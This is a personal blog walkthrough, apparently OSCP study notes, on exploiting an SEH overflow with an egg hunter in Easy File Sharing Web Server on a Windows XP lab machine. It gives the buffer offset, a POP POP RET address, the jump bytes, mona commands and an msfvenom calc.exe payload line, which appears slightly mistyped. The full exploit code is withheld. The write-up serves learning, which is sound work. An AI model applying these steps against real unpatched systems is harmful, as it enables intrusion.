SEH Overflow + Egg hunter in 1 go!

Standard

Hello pee-ple,

As the OSCP PWK course only covered basic stack-based overflow exploitation, I decided to learn about SEH overflows and the concept of egg hunters!

I will not be talking about the theory behind those 2 in this post.
Instead, I will be writing up how to exploit them.

I will re-write the existing exploit from scratch and hopefully it might be helpful to some of you haxxers out there!

Pre-requisite:
Understanding of Buffer Overflows (Simple stack based)
Configured Immunity Debugger and Mona.py
Read up on nSEH/SEH Overflow concepts
Read up on EggHunter concepts

Existing exploit available at –
https://www.exploit-db.com/exploits/40178/

Vulnerable application that we are attacking –
https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe

My target VM:
Windows XP SP3

My attacking VM:
Kali Linux

Let’s begin~!

Set up with Immunity Debugger and Mona.py

setup1

The application will crash with 4500 of junk buffer.
After sending 4500 junk buffer, press Shift + F9 to pass the exception and you should see that the EIP register is overwritten by “A”s

pattern_create.rb -l 4500
pattern_offset.rb -q $overwritten_eip_value
offset = 4065

Minus 4 from the offset to overwrite it with “C” buffer instead for the SEH handler
Your exploit PoC should look something like this:

junk = “A” * 4061 + “B” * 4 + “C” * 4 + “D” * 431

“B” -> nSEH
“C” -> SEH

Launch the exploit PoC, it should trigger an access violation, continue by passing it with Shift+F9, you should notice that the EIP are overwritten with 43434343 (“C”*4)

poc1

Now we should look for the address of a POP POP RETN instruction so we can land onto our “B” * 4 (nSEH) buffer.┬áRun “!mona seh” on the Immunity Debugger console.

!mona seh

Locate your Immunity Debugger folder (Example: C:\Program Files\Immunity Inc\Immunity Debugger)

sehppr

It will contain all the POP POP RET addresses, choose 1 that does not contain any dangerous bytes such as \x00

I decided on the address 0x1002379d

Replace the “C” * 4 with the PPR address that you have chosen

Restart your Immunity Debugger and reattach the process by pressing CTRL + F2, go to your PPR address 1002379d and set a breakpoint.

Rerun your updated PoC exploit. Shift + F9 to pass the exception first, then Step over with F7, you should end up at the “B” * 4 buffers after stepping over the POP POP RETN instructions.

4

Step over the POP POP RETN with F7.

5

Awesome.

Now we need to jump backward into our “A” buffers
“\xEB\xC4\x90\x90” will jump backwards 60 bytes (-60bytes on calculator)

Update your PoC exploit and replace the “B” * 4 with “\xEB\xC4\x90\x90”

Your PoC exploit should look something like this.

6

Set a breakpoint at your chosen PPR address again and rerun your updated PoC exploit. Shift + F9 to pass the exception first, then Step over with F7, you should end up at the “B” * 4 which is now replaced with “\xEB\xC4\x90\x90” (jump backward 60bytes) and by stepping over again, you should land in the “A” buffers.

The “\xEB\xC4\x90\x90” in Immunity Debugger.

7

Stepping over with F7 should land you into the “A” buffer.

8

Nice. You are all set to send your Egg Hunter tag, shellcode, and everything else in 1 go!

Generate your Egg Hunter tag with the following command on Immunity Debugger console.

!mona egg -t p0rn

Copy paste the generated 32 bytes hex codes into your PoC exploit.

9

Generate your shellcode with msfvenom:
msfvenom -p windows/exec cmd=calc.exe -e x86/alpa_mixed -f -c

Your final exploit PoC should look something like this:

10

All is set, embrace teh calculator!

11

Neat!

Note that there are other ways to pwn this application. Just having my own way of fun.
I have decided to exclude my full exploit code so that you can try it out yourself!

I know that SEH Overflows and Egg Hunter concept are obsolete. But…… It is always good to learn new stuff! Well at least for me.

Stay safe people!

~9emin1